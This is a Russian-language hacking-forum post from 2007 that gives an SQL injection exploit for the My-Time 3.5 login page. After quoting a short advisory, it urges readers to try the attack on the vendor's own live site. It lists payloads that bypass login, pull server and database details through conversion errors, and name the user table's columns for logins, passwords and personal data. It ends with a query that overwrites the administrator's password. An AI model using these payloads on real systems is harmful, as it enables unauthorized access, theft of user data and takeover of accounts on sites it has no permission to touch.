SQL-инъекция в My-Time<=3.5

SQL-инъекция в My-Time<=3.5

27.11.2007, 17:59

-=lebed=-

Флудер

Регистрация: 21.06.2006

Сообщений: 3,193

С нами: 10467746

Репутация: 4738

SQL-инъекция в My-Time<=3.5

Цитата:

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "login" и "password" сценарием login.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Тестим на сайте производителя! www.irola.com
_http://www.irola.com/mytime35/login.asp
1. Обход авторизации:
В поля ввода логин и пасс:

Код:

1' or 1=1--

2. Смотрим системные переменные:

Код:

1' or 1=convert(int,@@version)--
1' or 1=convert(int,@@servername)--
1' or 1=convert(int,db_name())--
1' or 1=convert(int,user_name())--
1' or 1=convert(int,system_user)--

3. Таблицы:

Код:

UserInfo.UserID
UserInfo.Login
UserInfo.Password
UserInfo.UserNumber
UserInfo.FirstName
UserInfo.LastName
UserInfo.TeamID
UserInfo.Address
UserInfo.City
UserInfo.ZipCode
UserInfo.CountryID
UserInfo.Phone

4. Меняем админский пароль:

Код:

-1' UPDATE UserInfo set Password= '1234' Where(UserID= '1');--

aria-security.net

𝕏 Twitter Reddit Telegram Копировать ссылку